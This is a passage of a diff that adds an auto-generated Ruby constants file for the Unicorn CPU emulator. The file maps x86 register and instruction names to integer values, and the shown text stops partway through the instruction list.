b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/lib/unicorn_engine/x86_const.rb @@ -0,0 +1,1602 @@ +# For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [x86_const.rb] + +module UnicornEngine + +# X86 registers + + UC_X86_REG_INVALID = 0 + UC_X86_REG_AH = 1 + UC_X86_REG_AL = 2 + UC_X86_REG_AX = 3 + UC_X86_REG_BH = 4 + UC_X86_REG_BL = 5 + UC_X86_REG_BP = 6 + UC_X86_REG_BPL = 7 + UC_X86_REG_BX = 8 + UC_X86_REG_CH = 9 + UC_X86_REG_CL = 10 + UC_X86_REG_CS = 11 + UC_X86_REG_CX = 12 + UC_X86_REG_DH = 13 + UC_X86_REG_DI = 14 + UC_X86_REG_DIL = 15 + UC_X86_REG_DL = 16 + UC_X86_REG_DS = 17 + UC_X86_REG_DX = 18 + UC_X86_REG_EAX = 19 + UC_X86_REG_EBP = 20 + UC_X86_REG_EBX = 21 + UC_X86_REG_ECX = 22 + UC_X86_REG_EDI = 23 + UC_X86_REG_EDX = 24 + UC_X86_REG_EFLAGS = 25 + UC_X86_REG_EIP = 26 + UC_X86_REG_EIZ = 27 + UC_X86_REG_ES = 28 + UC_X86_REG_ESI = 29 + UC_X86_REG_ESP = 30 + UC_X86_REG_FPSW = 31 + UC_X86_REG_FS = 32 + UC_X86_REG_GS = 33 + UC_X86_REG_IP = 34 + UC_X86_REG_RAX = 35 + UC_X86_REG_RBP = 36 + UC_X86_REG_RBX = 37 + UC_X86_REG_RCX = 38 + UC_X86_REG_RDI = 39 + UC_X86_REG_RDX = 40 + UC_X86_REG_RIP = 41 + UC_X86_REG_RIZ = 42 + UC_X86_REG_RSI = 43 + UC_X86_REG_RSP = 44 + UC_X86_REG_SI = 45 + UC_X86_REG_SIL = 46 + UC_X86_REG_SP = 47 + UC_X86_REG_SPL = 48 + UC_X86_REG_SS = 49 + UC_X86_REG_CR0 = 50 + UC_X86_REG_CR1 = 51 + UC_X86_REG_CR2 = 52 + UC_X86_REG_CR3 = 53 + UC_X86_REG_CR4 = 54 + UC_X86_REG_CR5 = 55 + UC_X86_REG_CR6 = 56 + UC_X86_REG_CR7 = 57 + UC_X86_REG_CR8 = 58 + UC_X86_REG_CR9 = 59 + UC_X86_REG_CR10 = 60 + UC_X86_REG_CR11 = 61 + UC_X86_REG_CR12 = 62 + UC_X86_REG_CR13 = 63 + UC_X86_REG_CR14 = 64 + UC_X86_REG_CR15 = 65 + UC_X86_REG_DR0 = 66 + UC_X86_REG_DR1 = 67 + UC_X86_REG_DR2 = 68 + UC_X86_REG_DR3 = 69 + UC_X86_REG_DR4 = 70 + UC_X86_REG_DR5 = 71 + UC_X86_REG_DR6 = 72 + UC_X86_REG_DR7 = 73 + UC_X86_REG_DR8 = 74 + UC_X86_REG_DR9 = 75 + UC_X86_REG_DR10 = 76 + UC_X86_REG_DR11 = 77 + UC_X86_REG_DR12 = 78 + UC_X86_REG_DR13 = 79 + UC_X86_REG_DR14 = 
80 + UC_X86_REG_DR15 = 81 + UC_X86_REG_FP0 = 82 + UC_X86_REG_FP1 = 83 + UC_X86_REG_FP2 = 84 + UC_X86_REG_FP3 = 85 + UC_X86_REG_FP4 = 86 + UC_X86_REG_FP5 = 87 + UC_X86_REG_FP6 = 88 + UC_X86_REG_FP7 = 89 + UC_X86_REG_K0 = 90 + UC_X86_REG_K1 = 91 + UC_X86_REG_K2 = 92 + UC_X86_REG_K3 = 93 + UC_X86_REG_K4 = 94 + UC_X86_REG_K5 = 95 + UC_X86_REG_K6 = 96 + UC_X86_REG_K7 = 97 + UC_X86_REG_MM0 = 98 + UC_X86_REG_MM1 = 99 + UC_X86_REG_MM2 = 100 + UC_X86_REG_MM3 = 101 + UC_X86_REG_MM4 = 102 + UC_X86_REG_MM5 = 103 + UC_X86_REG_MM6 = 104 + UC_X86_REG_MM7 = 105 + UC_X86_REG_R8 = 106 + UC_X86_REG_R9 = 107 + UC_X86_REG_R10 = 108 + UC_X86_REG_R11 = 109 + UC_X86_REG_R12 = 110 + UC_X86_REG_R13 = 111 + UC_X86_REG_R14 = 112 + UC_X86_REG_R15 = 113 + UC_X86_REG_ST0 = 114 + UC_X86_REG_ST1 = 115 + UC_X86_REG_ST2 = 116 + UC_X86_REG_ST3 = 117 + UC_X86_REG_ST4 = 118 + UC_X86_REG_ST5 = 119 + UC_X86_REG_ST6 = 120 + UC_X86_REG_ST7 = 121 + UC_X86_REG_XMM0 = 122 + UC_X86_REG_XMM1 = 123 + UC_X86_REG_XMM2 = 124 + UC_X86_REG_XMM3 = 125 + UC_X86_REG_XMM4 = 126 + UC_X86_REG_XMM5 = 127 + UC_X86_REG_XMM6 = 128 + UC_X86_REG_XMM7 = 129 + UC_X86_REG_XMM8 = 130 + UC_X86_REG_XMM9 = 131 + UC_X86_REG_XMM10 = 132 + UC_X86_REG_XMM11 = 133 + UC_X86_REG_XMM12 = 134 + UC_X86_REG_XMM13 = 135 + UC_X86_REG_XMM14 = 136 + UC_X86_REG_XMM15 = 137 + UC_X86_REG_XMM16 = 138 + UC_X86_REG_XMM17 = 139 + UC_X86_REG_XMM18 = 140 + UC_X86_REG_XMM19 = 141 + UC_X86_REG_XMM20 = 142 + UC_X86_REG_XMM21 = 143 + UC_X86_REG_XMM22 = 144 + UC_X86_REG_XMM23 = 145 + UC_X86_REG_XMM24 = 146 + UC_X86_REG_XMM25 = 147 + UC_X86_REG_XMM26 = 148 + UC_X86_REG_XMM27 = 149 + UC_X86_REG_XMM28 = 150 + UC_X86_REG_XMM29 = 151 + UC_X86_REG_XMM30 = 152 + UC_X86_REG_XMM31 = 153 + UC_X86_REG_YMM0 = 154 + UC_X86_REG_YMM1 = 155 + UC_X86_REG_YMM2 = 156 + UC_X86_REG_YMM3 = 157 + UC_X86_REG_YMM4 = 158 + UC_X86_REG_YMM5 = 159 + UC_X86_REG_YMM6 = 160 + UC_X86_REG_YMM7 = 161 + UC_X86_REG_YMM8 = 162 + UC_X86_REG_YMM9 = 163 + UC_X86_REG_YMM10 = 164 + UC_X86_REG_YMM11 = 165 + 
UC_X86_REG_YMM12 = 166 + UC_X86_REG_YMM13 = 167 + UC_X86_REG_YMM14 = 168 + UC_X86_REG_YMM15 = 169 + UC_X86_REG_YMM16 = 170 + UC_X86_REG_YMM17 = 171 + UC_X86_REG_YMM18 = 172 + UC_X86_REG_YMM19 = 173 + UC_X86_REG_YMM20 = 174 + UC_X86_REG_YMM21 = 175 + UC_X86_REG_YMM22 = 176 + UC_X86_REG_YMM23 = 177 + UC_X86_REG_YMM24 = 178 + UC_X86_REG_YMM25 = 179 + UC_X86_REG_YMM26 = 180 + UC_X86_REG_YMM27 = 181 + UC_X86_REG_YMM28 = 182 + UC_X86_REG_YMM29 = 183 + UC_X86_REG_YMM30 = 184 + UC_X86_REG_YMM31 = 185 + UC_X86_REG_ZMM0 = 186 + UC_X86_REG_ZMM1 = 187 + UC_X86_REG_ZMM2 = 188 + UC_X86_REG_ZMM3 = 189 + UC_X86_REG_ZMM4 = 190 + UC_X86_REG_ZMM5 = 191 + UC_X86_REG_ZMM6 = 192 + UC_X86_REG_ZMM7 = 193 + UC_X86_REG_ZMM8 = 194 + UC_X86_REG_ZMM9 = 195 + UC_X86_REG_ZMM10 = 196 + UC_X86_REG_ZMM11 = 197 + UC_X86_REG_ZMM12 = 198 + UC_X86_REG_ZMM13 = 199 + UC_X86_REG_ZMM14 = 200 + UC_X86_REG_ZMM15 = 201 + UC_X86_REG_ZMM16 = 202 + UC_X86_REG_ZMM17 = 203 + UC_X86_REG_ZMM18 = 204 + UC_X86_REG_ZMM19 = 205 + UC_X86_REG_ZMM20 = 206 + UC_X86_REG_ZMM21 = 207 + UC_X86_REG_ZMM22 = 208 + UC_X86_REG_ZMM23 = 209 + UC_X86_REG_ZMM24 = 210 + UC_X86_REG_ZMM25 = 211 + UC_X86_REG_ZMM26 = 212 + UC_X86_REG_ZMM27 = 213 + UC_X86_REG_ZMM28 = 214 + UC_X86_REG_ZMM29 = 215 + UC_X86_REG_ZMM30 = 216 + UC_X86_REG_ZMM31 = 217 + UC_X86_REG_R8B = 218 + UC_X86_REG_R9B = 219 + UC_X86_REG_R10B = 220 + UC_X86_REG_R11B = 221 + UC_X86_REG_R12B = 222 + UC_X86_REG_R13B = 223 + UC_X86_REG_R14B = 224 + UC_X86_REG_R15B = 225 + UC_X86_REG_R8D = 226 + UC_X86_REG_R9D = 227 + UC_X86_REG_R10D = 228 + UC_X86_REG_R11D = 229 + UC_X86_REG_R12D = 230 + UC_X86_REG_R13D = 231 + UC_X86_REG_R14D = 232 + UC_X86_REG_R15D = 233 + UC_X86_REG_R8W = 234 + UC_X86_REG_R9W = 235 + UC_X86_REG_R10W = 236 + UC_X86_REG_R11W = 237 + UC_X86_REG_R12W = 238 + UC_X86_REG_R13W = 239 + UC_X86_REG_R14W = 240 + UC_X86_REG_R15W = 241 + UC_X86_REG_IDTR = 242 + UC_X86_REG_GDTR = 243 + UC_X86_REG_LDTR = 244 + UC_X86_REG_TR = 245 + UC_X86_REG_FPCW = 246 + UC_X86_REG_FPTAG = 
247 + UC_X86_REG_MSR = 248 + UC_X86_REG_MXCSR = 249 + UC_X86_REG_FS_BASE = 250 + UC_X86_REG_GS_BASE = 251 + UC_X86_REG_ENDING = 252 + +# X86 instructions + + UC_X86_INS_INVALID = 0 + UC_X86_INS_AAA = 1 + UC_X86_INS_AAD = 2 + UC_X86_INS_AAM = 3 + UC_X86_INS_AAS = 4 + UC_X86_INS_FABS = 5 + UC_X86_INS_ADC = 6 + UC_X86_INS_ADCX = 7 + UC_X86_INS_ADD = 8 + UC_X86_INS_ADDPD = 9 + UC_X86_INS_ADDPS = 10 + UC_X86_INS_ADDSD = 11 + UC_X86_INS_ADDSS = 12 + UC_X86_INS_ADDSUBPD = 13 + UC_X86_INS_ADDSUBPS = 14 + UC_X86_INS_FADD = 15 + UC_X86_INS_FIADD = 16 + UC_X86_INS_FADDP = 17 + UC_X86_INS_ADOX = 18 + UC_X86_INS_AESDECLAST = 19 + UC_X86_INS_AESDEC = 20 + UC_X86_INS_AESENCLAST = 21 + UC_X86_INS_AESENC = 22 + UC_X86_INS_AESIMC = 23 + UC_X86_INS_AESKEYGENASSIST = 24 + UC_X86_INS_AND = 25 + UC_X86_INS_ANDN = 26 + UC_X86_INS_ANDNPD = 27 + UC_X86_INS_ANDNPS = 28 + UC_X86_INS_ANDPD = 29 + UC_X86_INS_ANDPS = 30 + UC_X86_INS_ARPL = 31 + UC_X86_INS_BEXTR = 32 + UC_X86_INS_BLCFILL = 33 + UC_X86_INS_BLCI = 34 + UC_X86_INS_BLCIC = 35 + UC_X86_INS_BLCMSK = 36 + UC_X86_INS_BLCS = 37 + UC_X86_INS_BLENDPD = 38 + UC_X86_INS_BLENDPS = 39 + UC_X86_INS_BLENDVPD = 40 + UC_X86_INS_BLENDVPS = 41 + UC_X86_INS_BLSFILL = 42 + UC_X86_INS_BLSI = 43 + UC_X86_INS_BLSIC = 44 + UC_X86_INS_BLSMSK = 45 + UC_X86_INS_BLSR = 46 + UC_X86_INS_BOUND = 47 + UC_X86_INS_BSF = 48 + UC_X86_INS_BSR = 49 + UC_X86_INS_BSWAP = 50 + UC_X86_INS_BT = 51 + UC_X86_INS_BTC = 52 + UC_X86_INS_BTR = 53 + UC_X86_INS_BTS = 54 + UC_X86_INS_BZHI = 55 + UC_X86_INS_CALL = 56 + UC_X86_INS_CBW = 57 + UC_X86_INS_CDQ = 58 + UC_X86_INS_CDQE = 59 + UC_X86_INS_FCHS = 60 + UC_X86_INS_CLAC = 61 + UC_X86_INS_CLC = 62 + UC_X86_INS_CLD = 63 + UC_X86_INS_CLFLUSH = 64 + UC_X86_INS_CLFLUSHOPT = 65 + UC_X86_INS_CLGI = 66 + UC_X86_INS_CLI = 67 + UC_X86_INS_CLTS = 68 + UC_X86_INS_CLWB = 69 + UC_X86_INS_CMC = 70 + UC_X86_INS_CMOVA = 71 + UC_X86_INS_CMOVAE = 72 + UC_X86_INS_CMOVB = 73 + UC_X86_INS_CMOVBE = 74 + UC_X86_INS_FCMOVBE = 75 + UC_X86_INS_FCMOVB = 76 + 
UC_X86_INS_CMOVE = 77 + UC_X86_INS_FCMOVE = 78 + UC_X86_INS_CMOVG = 79 + UC_X86_INS_CMOVGE = 80 + UC_X86_INS_CMOVL = 81 + UC_X86_INS_CMOVLE = 82 + UC_X86_INS_FCMOVNBE = 83 + UC_X86_INS_FCMOVNB = 84 + UC_X86_INS_CMOVNE = 85 + UC_X86_INS_FCMOVNE = 86 + UC_X86_INS_CMOVNO = 87 + UC_X86_INS_CMOVNP = 88 + UC_X86_INS_FCMOVNU = 89 + UC_X86_INS_CMOVNS = 90 + UC_X86_INS_CMOVO = 91 + UC_X86_INS_CMOVP = 92 + UC_X86_INS_FCMOVU = 93 + UC_X86_INS_CMOVS = 94 + UC_X86_INS_CMP = 95 + UC_X86_INS_CMPPD = 96 + UC_X86_INS_CMPPS = 97 + UC_X86_INS_CMPSB = 98 + UC_X86_INS_CMPSD = 99 + UC_X86_INS_CMPSQ = 100 + UC_X86_INS_CMPSS = 101 + UC_X86_INS_CMPSW = 102 + UC_X86_INS_CMPXCHG16B = 103 + UC_X86_INS_CMPXCHG = 104 + UC_X86_INS_CMPXCHG8B = 105 + UC_X86_INS_COMISD = 106 + UC_X86_INS_COMISS = 107 + UC_X86_INS_FCOMP = 108 + UC_X86_INS_FCOMPI = 109 + UC_X86_INS_FCOMI = 110 + UC_X86_INS_FCOM = 111 + UC_X86_INS_FCOS = 112 + UC_X86_INS_CPUID = 113 + UC_X86_INS_CQO = 114 + UC_X86_INS_CRC32 = 115 + UC_X86_INS_CVTDQ2PD = 116 + UC_X86_INS_CVTDQ2PS = 117 + UC_X86_INS_CVTPD2DQ = 118 + UC_X86_INS_CVTPD2PS = 119 + UC_X86_INS_CVTPS2DQ = 120 + UC_X86_INS_CVTPS2PD = 121 + UC_X86_INS_CVTSD2SI = 122 + UC_X86_INS_CVTSD2SS = 123 + UC_X86_INS_CVTSI2SD = 124 + UC_X86_INS_CVTSI2SS = 125 + UC_X86_INS_CVTSS2SD = 126 + UC_X86_INS_CVTSS2SI = 127 + UC_X86_INS_CVTTPD2DQ = 128 + UC_X86_INS_CVTTPS2DQ = 129 + UC_X86_INS_CVTTSD2SI = 130 + UC_X86_INS_CVTTSS2SI = 131 + UC_X86_INS_CWD = 132 + UC_X86_INS_CWDE = 133 + UC_X86_INS_DAA = 134 + UC_X86_INS_DAS = 135 + UC_X86_INS_DATA16 = 136 + UC_X86_INS_DEC = 137 + UC_X86_INS_DIV = 138 + UC_X86_INS_DIVPD = 139 + UC_X86_INS_DIVPS = 140 + UC_X86_INS_FDIVR = 141 + UC_X86_INS_FIDIVR = 142 + UC_X86_INS_FDIVRP = 143 + UC_X86_INS_DIVSD = 144 + UC_X86_INS_DIVSS = 145 + UC_X86_INS_FDIV = 146 + UC_X86_INS_FIDIV = 147 + UC_X86_INS_FDIVP = 148 + UC_X86_INS_DPPD = 149 + UC_X86_INS_DPPS = 150 + UC_X86_INS_RET = 151 + UC_X86_INS_ENCLS = 152 + UC_X86_INS_ENCLU = 153 + UC_X86_INS_ENTER = 154 + 
UC_X86_INS_EXTRACTPS = 155 + UC_X86_INS_EXTRQ = 156 + UC_X86_INS_F2XM1 = 157 + UC_X86_INS_LCALL = 158 + UC_X86_INS_LJMP = 159 + UC_X86_INS_FBLD = 160 + UC_X86_INS_FBSTP = 161 + UC_X86_INS_FCOMPP = 162 + UC_X86_INS_FDECSTP = 163 + UC_X86_INS_FEMMS = 164 + UC_X86_INS_FFREE = 165 + UC_X86_INS_FICOM = 166 + UC_X86_INS_FICOMP = 167 + UC_X86_INS_FINCSTP = 168 + UC_X86_INS_FLDCW = 169 + UC_X86_INS_FLDENV = 170 + UC_X86_INS_FLDL2E = 171 + UC_X86_INS_FLDL2T = 172 + UC_X86_INS_FLDLG2 = 173 + UC_X86_INS_FLDLN2 = 174 + UC_X86_INS_FLDPI = 175 + UC_X86_INS_FNCLEX = 176 + UC_X86_INS_FNINIT = 177 + UC_X86_INS_FNOP = 178 + UC_X86_INS_FNSTCW = 179 + UC_X86_INS_FNSTSW = 180 + UC_X86_INS_FPATAN = 181 + UC_X86_INS_FPREM = 182 + UC_X86_INS_FPREM1 = 183 + UC_X86_INS_FPTAN = 184 + UC_X86_INS_FFREEP = 185 + UC_X86_INS_FRNDINT = 186 + UC_X86_INS_FRSTOR = 187 + UC_X86_INS_FNSAVE = 188 + UC_X86_INS_FSCALE = 189 + UC_X86_INS_FSETPM = 190 + UC_X86_INS_FSINCOS = 191 + UC_X86_INS_FNSTENV = 192 + UC_X86_INS_FXAM = 193 + UC_X86_INS_FXRSTOR = 194 + UC_X86_INS_FXRSTOR64 = 195 + UC_X86_INS_FXSAVE = 196 + UC_X86_INS_FXSAVE64 = 197 + UC_X86_INS_FXTRACT = 198 + UC_X86_INS_FYL2X = 199 + UC_X86_INS_FYL2XP1 = 200 + UC_X86_INS_MOVAPD = 201 + UC_X86_INS_MOVAPS = 202 + UC_X86_INS_ORPD = 203 + UC_X86_INS_ORPS = 204 + UC_X86_INS_VMOVAPD = 205 + UC_X86_INS_VMOVAPS = 206 + UC_X86_INS_XORPD = 207 + UC_X86_INS_XORPS = 208 + UC_X86_INS_GETSEC = 209 + UC_X86_INS_HADDPD = 210 + UC_X86_INS_HADDPS = 211 + UC_X86_INS_HLT = 212 + UC_X86_INS_HSUBPD = 213 + UC_X86_INS_HSUBPS = 214 + UC_X86_INS_IDIV = 215 + UC_X86_INS_FILD = 216 + UC_X86_INS_IMUL = 217 + UC_X86_INS_IN = 218 + UC_X86_INS_INC = 219 + UC_X86_INS_INSB = 220 + UC_X86_INS_INSERTPS = 221 + UC_X86_INS_INSERTQ = 222 + UC_X86_INS_INSD = 223 + UC_X86_INS_INSW = 224 + UC_X86_INS_INT = 225 + UC_X86_INS_INT1 = 226 + UC_X86_INS_INT3 = 227 + UC_X86_INS_INTO = 228 + UC_X86_INS_INVD = 229 + UC_X86_INS_INVEPT = 230 + UC_X86_INS_INVLPG = 231 + UC_X86_INS_INVLPGA = 232 + 
UC_X86_INS_INVPCID = 233 + UC_X86_INS_INVVPID = 234 + UC_X86_INS_IRET = 235 + UC_X86_INS_IRETD = 236 + UC_X86_INS_IRETQ = 237 + UC_X86_INS_FISTTP = 238 + UC_X86_INS_FIST = 239 + UC_X86_INS_FISTP = 240 + UC_X86_INS_UCOMISD = 241 + UC_X86_INS_UCOMISS = 242 + UC_X86_INS_VCOMISD = 243 + UC_X86_INS_VCOMISS = 244 + UC_X86_INS_VCVTSD2SS = 245 + UC_X86_INS_VCVTSI2SD = 246 + UC_X86_INS_VCVTSI2SS = 247 + UC_X86_INS_VCVTSS2SD = 248 + UC_X86_INS_VCVTTSD2SI = 249 + UC_X86_INS_VCVTTSD2USI = 250 + UC_X86_INS_VCVTTSS2SI = 251 + UC_X86_INS_VCVTTSS2USI = 252 + UC_X86_INS_VCVTUSI2SD = 253 + UC_X86_INS_VCVTUSI2SS = 254 + UC_X86_INS_VUCOMISD = 255 + UC_X86_INS_VUCOMISS = 256 + UC_X86_INS_JAE = 257 + UC_X86_INS_JA = 258 + UC_X86_INS_JBE = 259 + UC_X86_INS_JB = 260 + UC_X86_INS_JCXZ = 261 + UC_X86_INS_JECXZ = 262 + UC_X86_INS_JE = 263 + UC_X86_INS_JGE = 264 + UC_X86_INS_JG = 265 + UC_X86_INS_JLE = 266 + UC_X86_INS_JL = 267 + UC_X86_INS_JMP = 268 + UC_X86_INS_JNE = 269 + UC_X86_INS_JNO = 270 + UC_X86_INS_JNP = 271 + UC_X86_INS_JNS = 272 + UC_X86_INS_JO = 273 + UC_X86_INS_JP = 274 + UC_X86_INS_JRCXZ = 275 + UC_X86_INS_JS = 276 + UC_X86_INS_KANDB = 277 + UC_X86_INS_KANDD = 278 + UC_X86_INS_KANDNB = 279 + UC_X86_INS_KANDND = 280 + UC_X86_INS_KANDNQ = 281 + UC_X86_INS_KANDNW = 282 + UC_X86_INS_KANDQ = 283 + UC_X86_INS_KANDW = 284 + UC_X86_INS_KMOVB = 285 + UC_X86_INS_KMOVD = 286 + UC_X86_INS_KMOVQ = 287 + UC_X86_INS_KMOVW = 288 + UC_X86_INS_KNOTB = 289 + UC_X86_INS_KNOTD = 290 + UC_X86_INS_KNOTQ = 291 + UC_X86_INS_KNOTW = 292 + UC_X86_INS_KORB = 293 + UC_X86_INS_KORD = 294 + UC_X86_INS_KORQ = 295 + UC_X86_INS_KORTESTB = 296 + UC_X86_INS_KORTESTD = 297 + UC_X86_INS_KORTESTQ = 298 + UC_X86_INS_KORTESTW = 299 + UC_X86_INS_KORW = 300 + UC_X86_INS_KSHIFTLB = 301 + UC_X86_INS_KSHIFTLD = 302 + UC_X86_INS_KSHIFTLQ = 303 + UC_X86_INS_KSHIFTLW = 304 + UC_X86_INS_KSHIFTRB = 305 + UC_X86_INS_KSHIFTRD = 306 + UC_X86_INS_KSHIFTRQ = 307 + UC_X86_INS_KSHIFTRW = 308 + UC_X86_INS_KUNPCKBW = 309 + 
UC_X86_INS_KXNORB = 310 + UC_X86_INS_KXNORD = 311 + UC_X86_INS_KXNORQ = 312 + UC_X86_INS_KXNORW = 313 + UC_X86_INS_KXORB = 314 + UC_X86_INS_KXORD = 315 + UC_X86_INS_KXORQ = 316 + UC_X86_INS_KXORW = 317 + UC_X86_INS_LAHF = 318 + UC_X86_INS_LAR = 319 + UC_X86_INS_LDDQU = 320 + UC_X86_INS_LDMXCSR = 321 + UC_X86_INS_LDS = 322 + UC_X86_INS_FLDZ = 323 + UC_X86_INS_FLD1 = 324 + UC_X86_INS_FLD = 325 + UC_X86_INS_LEA = 326 + UC_X86_INS_LEAVE = 327 + UC_X86_INS_LES = 328 + UC_X86_INS_LFENCE = 329 + UC_X86_INS_LFS = 330 + UC_X86_INS_LGDT = 331 + UC_X86_INS_LGS = 332 + UC_X86_INS_LIDT = 333 + UC_X86_INS_LLDT = 334 + UC_X86_INS_LMSW = 335 + UC_X86_INS_OR = 336 + UC_X86_INS_SUB = 337 + UC_X86_INS_XOR = 338 + UC_X86_INS_LODSB = 339 + UC_X86_INS_LODSD = 340 + UC_X86_INS_LODSQ = 341 + UC_X86_INS_LODSW = 342 + UC_X86_INS_LOOP = 343 + UC_X86_INS_LOOPE = 344 + UC_X86_INS_LOOPNE = 345 + UC_X86_INS_RETF = 346 + UC_X86_INS_RETFQ = 347 + UC_X86_INS_LSL = 348 + UC_X86_INS_LSS = 349 + UC_X86_INS_LTR = 350 + UC_X86_INS_XADD = 351 + UC_X86_INS_LZCNT = 352 + UC_X86_INS_MASKMOVDQU = 353 + UC_X86_INS_MAXPD = 354 + UC_X86_INS_MAXPS = 355 + UC_X86_INS_MAXSD = 356 + UC_X86_INS_MAXSS = 357 + UC_X86_INS_MFENCE = 358 + UC_X86_INS_MINPD = 359 + UC_X86_INS_MINPS = 360 + UC_X86_INS_MINSD = 361 + UC_X86_INS_MINSS = 362 + UC_X86_INS_CVTPD2PI = 363 + UC_X86_INS_CVTPI2PD = 364 + UC_X86_INS_CVTPI2PS = 365 + UC_X86_INS_CVTPS2PI = 366 + UC_X86_INS_CVTTPD2PI = 367 + UC_X86_INS_CVTTPS2PI = 368 + UC_X86_INS_EMMS = 369 + UC_X86_INS_MASKMOVQ = 370 + UC_X86_INS_MOVD = 371 + UC_X86_INS_MOVDQ2Q = 372 + UC_X86_INS_MOVNTQ = 373 + UC_X86_INS_MOVQ2DQ = 374 + UC_X86_INS_MOVQ = 375 + UC_X86_INS_PABSB = 376 + UC_X86_INS_PABSD = 377 + UC_X86_INS_PABSW = 378 + UC_X86_INS_PACKSSDW = 379 + UC_X86_INS_PACKSSWB = 380 + UC_X86_INS_PACKUSWB = 381 + UC_X86_INS_PADDB = 382 + UC_X86_INS_PADDD = 383 + UC_X86_INS_PADDQ = 384 + UC_X86_INS_PADDSB = 385 + UC_X86_INS_PADDSW = 386 + UC_X86_INS_PADDUSB = 387 + UC_X86_INS_PADDUSW = 388 + 
UC_X86_INS_PADDW = 389 + UC_X86_INS_PALIGNR = 390 + UC_X86_INS_PANDN = 391 + UC_X86_INS_PAND = 392 + UC_X86_INS_PAVGB = 393 + UC_X86_INS_PAVGW = 394 + UC_X86_INS_PCMPEQB = 395 + UC_X86_INS_PCMPEQD = 396 + UC_X86_INS_PCMPEQW = 397 + UC_X86_INS_PCMPGTB = 398 + UC_X86_INS_PCMPGTD = 399 + UC_X86_INS_PCMPGTW = 400 + UC_X86_INS_PEXTRW = 401 + UC_X86_INS_PHADDSW = 402 + UC_X86_INS_PHADDW = 403 + UC_X86_INS_PHADDD = 404 + UC_X86_INS_PHSUBD = 405 + UC_X86_INS_PHSUBSW = 406 + UC_X86_INS_PHSUBW = 407 + UC_X86_INS_PINSRW = 408 + UC_X86_INS_PMADDUBSW = 409 + UC_X86_INS_PMADDWD = 410 + UC_X86_INS_PMAXSW = 411 + UC_X86_INS_PMAXUB = 412 + UC_X86_INS_PMINSW = 413 + UC_X86_INS_PMINUB = 414 + UC_X86_INS_PMOVMSKB = 415 + UC_X86_INS_PMULHRSW = 416 + UC_X86_INS_PMULHUW = 417 + UC_X86_INS_PMULHW = 418 + UC_X86_INS_PMULLW = 419 + UC_X86_INS_PMULUDQ = 420 + UC_X86_INS_POR = 421 + UC_X86_INS_PSADBW = 422 + UC_X86_INS_PSHUFB = 423 + UC_X86_INS_PSHUFW = 424 + UC_X86_INS_PSIGNB = 425 + UC_X86_INS_PSIGND = 426 + UC_X86_INS_PSIGNW = 427 + UC_X86_INS_PSLLD = 428 + UC_X86_INS_PSLLQ = 429 + UC_X86_INS_PSLLW = 430 + UC_X86_INS_PSRAD = 431 + UC_X86_INS_PSRAW = 432 + UC_X86_INS_PSRLD = 433 + UC_X86_INS_PSRLQ = 434 + UC_X86_INS_PSRLW = 435 + UC_X86_INS_PSUBB = 436 + UC_X86_INS_PSUBD = 437 + UC_X86_INS_PSUBQ = 438 + UC_X86_INS_PSUBSB = 439 + UC_X86_INS_PSUBSW = 440 + UC_X86_INS_PSUBUSB = 441 + UC_X86_INS_PSUBUSW = 442 + UC_X86_INS_PSUBW = 443 + UC_X86_INS_PUNPCKHBW = 444 + UC_X86_INS_PUNPCKHDQ = 445 + UC_X86_INS_PUNPCKHWD = 446 + UC_X86_INS_PUNPCKLBW = 447 + UC_X86_INS_PUNPCKLDQ = 448 + UC_X86_INS_PUNPCKLWD = 449 + UC_X86_INS_PXOR = 450 + UC_X86_INS_MONITOR = 451 + UC_X86_INS_MONTMUL = 452 + UC_X86_INS_MOV = 453 + UC_X86_INS_MOVABS = 454 + UC_X86_INS_MOVBE = 455 + UC_X86_INS_MOVDDUP = 456 + UC_X86_INS_MOVDQA = 457 + UC_X86_INS_MOVDQU = 458 + UC_X86_INS_MOVHLPS = 459 + UC_X86_INS_MOVHPD = 460 + UC_X86_INS_MOVHPS = 461 + UC_X86_INS_MOVLHPS = 462 + UC_X86_INS_MOVLPD = 463 + UC_X86_INS_MOVLPS = 464 + 
UC_X86_INS_MOVMSKPD = 465 + UC_X86_INS_MOVMSKPS = 466 + UC_X86_INS_MOVNTDQA = 467 + UC_X86_INS_MOVNTDQ = 468 + UC_X86_INS_MOVNTI = 469 + UC_X86_INS_MOVNTPD = 470 + UC_X86_INS_MOVNTPS = 471 + UC_X86_INS_MOVNTSD = 472 + UC_X86_INS_MOVNTSS = 473 + UC_X86_INS_MOVSB = 474 + UC_X86_INS_MOVSD = 475 + UC_X86_INS_MOVSHDUP = 476 + UC_X86_INS_MOVSLDUP = 477 + UC_X86_INS_MOVSQ = 478 + UC_X86_INS_MOVSS = 479 + UC_X86_INS_MOVSW = 480 + UC_X86_INS_MOVSX = 481 + UC_X86_INS_MOVSXD = 482 + UC_X86_INS_MOVUPD = 483 + UC_X86_INS_MOVUPS = 484 + UC_X86_INS_MOVZX = 485 + UC_X86_INS_MPSADBW = 486 + UC_X86_INS_MUL = 487 + UC_X86_INS_MULPD = 488 + UC_X86_INS_MULPS = 489 + UC_X86_INS_MULSD = 490 + UC_X86_INS_MULSS = 491 + UC_X86_INS_MULX = 492 + UC_X86_INS_FMUL = 493 + UC_X86_INS_FIMUL = 494 + UC_X86_INS_FMULP = 495 + UC_X86_INS_MWAIT = 496 + UC_X86_INS_NEG = 497 + UC_X86_INS_NOP = 498 + UC_X86_INS_NOT = 499 + UC_X86_INS_OUT = 500 + UC_X86_INS_OUTSB = 501 + UC_X86_INS_OUTSD = 502 + UC_X86_INS_OUTSW = 503 + UC_X86_INS_PACKUSDW = 504 + UC_X86_INS_PAUSE = 505 + UC_X86_INS_PAVGUSB = 506 + UC_X86_INS_PBLENDVB = 507 + UC_X86_INS_PBLENDW = 508 + UC_X86_INS_PCLMULQDQ = 509 + UC_X86_INS_PCMPEQQ = 510 + UC_X86_INS_PCMPESTRI = 511 + UC_X86_INS_PCMPESTRM = 512 + UC_X86_INS_PCMPGTQ = 513 + UC_X86_INS_PCMPISTRI = 514 + UC_X86_INS_PCMPISTRM = 515 + UC_X86_INS_PCOMMIT = 516 + UC_X86_INS_PDEP = 517 + UC_X86_INS_PEXT = 518 + UC_X86_INS_PEXTRB = 519 + UC_X86_INS_PEXTRD = 520 + UC_X86_INS_PEXTRQ = 521 + UC_X86_INS_PF2ID = 522 + UC_X86_INS_PF2IW = 523 + UC_X86_INS_PFACC = 524 + UC_X86_INS_PFADD = 525 + UC_X86_INS_PFCMPEQ = 526 + UC_X86_INS_PFCMPGE = 527 + UC_X86_INS_PFCMPGT = 528 + 